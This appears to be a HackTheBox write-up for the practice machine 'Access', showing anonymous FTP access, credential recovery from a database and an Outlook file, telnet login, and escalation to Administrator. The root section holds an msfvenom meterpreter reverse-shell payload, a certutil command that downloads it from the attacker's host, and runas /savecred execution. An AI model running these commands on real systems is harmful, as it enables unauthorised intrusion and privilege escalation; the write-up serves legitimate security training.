Access from HackTheBox

TL;DR

Anonymous login to a FTP server allowed access to backups files.  From the backups, a password for a protected zip could be found.  The archive contained emails which contained credentials to connect to telnet allowing a user level shell. runas could then be used to execute a reverse shell as the Administrator because the account had saved credentials.

User

As ever lets throw Nmap at it and see what it reveals.

# Nmap 7.70 scan initiated Sat Sep 29 15:00:27 2018 as: nmap -sV -sS -sC -o nmap-initial.txt 10.10.10.98
Nmap scan report for 10.10.10.98
Host is up (0.074s latency).
Not shown: 997 filtered ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst: 
|_  SYST: Windows_NT
23/tcp open  telnet?
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: MegaCorp
|_tomcat-scan: /manager/html is HTTP 404.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Sep 29 15:03:57 2018 -- 1 IP address (1 host up) scanned in 210.29 seconds

This scan reveals 3 open ports:

  • 21/tcp - A FTP server - The default scripts have determined that anonymous login is allowed this means that there are likely to be files we can access.
  • 23/tcp - Telnet - Telnet wants a username and password for authentication that we don't have yet.
  • 80/tcp - HTTP - At a glance there is nothing useful here

FTP Server

Nmap determined that the FTP server allowed anonymous logins.  This means that after we connect to the server with ftp 10.10.10.98 we can login with the default credentials of anonymous and a blank password.

Connected to 10.10.10.98.
220 Microsoft FTP Service
Name (10.10.10.98:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-23-18  08:16PM       <DIR>          Backups
08-24-18  09:00PM       <DIR>          Engineer
226 Transfer complete.

We are greeted by two directories the first Backups contains a file named backup.mdb and the second Engineer contains a file named Access Control.zip we can download them with get.

ftp> cd Backups
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-23-18  08:16PM              5652480 backup.mdb
226 Transfer complete.
ftp> get backup.mdb
local: backup.mdb remote: backup.mdb
200 PORT command successful.
125 Data connection already open; Transfer starting.
WARNING! 28296 bare linefeeds received in ASCII mode
File may not have transferred correctly.
226 Transfer complete.
5652480 bytes received in 3.23 secs (1.6692 MB/s)
ftp> cd ..
250 CWD command successful.
ftp> cd Engineer
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-24-18  12:16AM                10870 Access Control.zip
226 Transfer complete.
ftp> get Access Control.zip
local: Control.zip remote: Access
200 PORT command successful.
550 The system cannot find the file specified.
ftp> get "Access Control.zip"
local: Access Control.zip remote: Access Control.zip
200 PORT command successful.
125 Data connection already open; Transfer starting.
WARNING! 45 bare linefeeds received in ASCII mode
File may not have transferred correctly.
226 Transfer complete.
10870 bytes received in 0.13 secs (80.7015 kB/s)

We now have two files from the FTP server.  The first appears to be a Microsoft Access Database and the second a password protected zip.

backup.mdb

Running strings on backup.mdb we are presented with the ascii text from the file. Running simply strings backup.mdb produces too much noise so setting the -n option refines the search to remove noise.  Running strings -n 10 backup.mdb is a sufficient filter and some potential passwords can be seen. Likely to be for the zip file.

JMOLqQikYdb
MWQM\YbMd^di
MWQM\domMd^di
OLqQikYdbJMMQkk
`YbkbdLiQJ\Yb
`YbkbdLiQJ\dom
`Ybkbd^QJqQ
`YbkbdmdqQimY`Q
`Ybksdi\OJv
bdLiQJ\dom
domdqQimY`Q
administrator;
Administrator<
4555555555555Q
ppermission
backup_admin
[email protected] <--- Looks Suspicious to me

Access Control.zip

[email protected] is in fact the password for the zip.  However, you'll find that it can't be extracted using unzip with it citing unsupported compression method 99. If you look up compression method 99 you'll find that it uses AES encryption which isn't currently supported by the unzip binary. Luckily, the system archive manager (in Gnome at least) can be used as an alternative.

Extract ZIP
Using the system archive manager to extract the problematic zip.


Within the zip is a .pst file using file to determine its type yields.
Access Control.pst: Microsoft Outlook email folder (>=2003)
When I first did this box, I'll be honest i just found an online converter to view the file and while its not the best practice in the heat of the moment while the blood was still very much up for grabs it worked.

This way looks nicer too.

However, you could say the proper way of doing this was with the readpst command.

readpst -o ./ Access\ Control.pst 
Opening PST file and indexes...
Processing Folder "Deleted Items"
	"Access Control" - 2 items done, 0 items skipped.

The email can then clearly be seen in the 2.eml file it will create.

Hi there,



The password for the “security” account has been changed to 4Cc3ssC0ntr0ller.  Please ensure this is passed on to your engineers.



Regards,

John

Either way once the email is extracted we obtain the username security and a password 4Cc3ssC0ntr0ller.  This will likely be for telnet.

Telnet

After using telnet 10.10.10.98 it is seen that is in fact the case as these credentials are accepted.  Once connected you can navigate to the user.txt flag and print it with type user.txt.

Trying 10.10.10.98...
Connected to 10.10.10.98.
Escape character is '^]'.
Welcome to Microsoft Telnet Service 

login: security
password: 

*===============================================================
Microsoft Telnet Server.
*===============================================================
C:\Users\security>cd Desktop

C:\Users\security\Desktop>type user.txt

Root

Start msfconsole and load the exploit listener with use exploit/multi/handler.  Next set the payload as windows/meterpreter/reverse_tcp and populate the options as required for your needs and start the listener with run.

msf > use exploit/multi/handler 
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 10.13.37.10
lhost => 10.13.37.10
msf exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.13.37.10      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.13.37.10:4444

Next we need to generate a payload to do this we will use:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.13.37.10 LPORT=4444 -f exe > shell.exe

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of exe file: 73802 bytes

Now we need to host this file so that we can access it, to do this we will use python's SimpleHTTPServer

python -m SimpleHTTPServer 80

Then to download the shell we can make use of certutil (this may not work on all versions of Windows) as we are using certutil we have to host the web server on port 80 instead of the default 8000.

certutil.exe -urlcache -split -f http://10.10.MY.IP/shell.exe shell.exe

Finally we run runas /savecred /user:ACCESS\Administrator shell.exe to execute the shell as the administrator.  This can be done because the account has saved credentials.

C:\Users\security\Desktop>cd C:\temp

C:\temp>certutil.exe -urlcache -split -f http://10.10.14.1/shell.exe shell.exe
**** Online ****
  000000  ...
  01204a
CertUtil: -URLCache command completed successfully.

C:\temp>runas /savecred /user:ACCESS\Administrator shell.exe

C:\temp>

If you look at the msfconsole you should now have a privileged shell waiting for you that can be used to read root.txt.

[*] Started reverse TCP handler on 10.10.13.37:4444
[*] Sending stage (179779 bytes) to 10.10.10.98
[*] Meterpreter session 1 opened (10.10.13.37:4444 -> 10.10.10.98:49200)

meterpreter > shell
Process 3428 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>cd c:\Users\Administrator\Desktop
cd C:\Users\Administrator\Desktop

C:\Users\Administrator\Desktop> type root.txt